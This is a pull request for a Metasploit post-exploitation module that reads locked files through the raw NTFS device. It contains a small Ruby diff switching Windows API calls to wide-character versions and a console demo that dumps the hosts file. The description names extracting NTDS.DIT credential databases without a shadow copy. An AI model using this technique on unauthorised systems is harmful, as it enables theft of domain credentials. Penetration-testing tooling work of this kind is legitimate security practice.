### PR TITLE
Add an NTFS parser and a post module to dump files

### DIFF
--- a/modules/post/windows/gather/file_in_raw_ntfs.rb
+++ b/modules/post/windows/gather/file_in_raw_ntfs.rb
@@ -38,7 +38,7 @@ class Metasploit3 < Msf::Post
 
     file_path = datastore['FILE_PATH']
 
-    r = client.railgun.kernel32.GetFileAttributesA(file_path)
+    r = client.railgun.kernel32.GetFileAttributesW(file_path)
 
     if r['GetLastError'] != 0
       fail_with(
@@ -49,7 +49,7 @@ class Metasploit3 < Msf::Post
 
     drive = file_path[0, 2]
 
-    r = client.railgun.kernel32.CreateFileA("\\\\.\\#{drive}",
+    r = client.railgun.kernel32.CreateFileW("\\\\.\\#{drive}",
                                             'GENERIC_READ',
                                             'FILE_SHARE_DELETE|FILE_SHARE_READ|FILE_SHARE_WRITE',
                                             nil,


### PR DESCRIPTION
This commit add a draft of an NTFS Parser and a post module
to gather files using the raw NTFS device (\\.\C:)
bypassing restriction like already open file with lock
Can be used to retreive files like NTDS.DIT without volume shadow copy

```
msf exploit(handler) > use post/windows/gather/file_in_raw_ntfs
msf post(file_in_raw_ntfs) > set FILE C:\\Windows\\System32\\drivers\\etc\\hosts
FILE => C:\Windows\System32\drivers\etc\hosts
msf post(file_in_raw_ntfs) > set SESSION 1
SESSION => 1
msf post(file_in_raw_ntfs) > run

[*] Successfuly opened C:
[*] Saving file hosts
[*] Post Successfuly
[*] Post module execution completed
msf post(file_in_raw_ntfs) > cat hosts
[*] exec: cat hosts

# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

# localhost name resolution is handled within DNS itself.
#   127.0.0.1       localhost
#   ::1             localhost
```
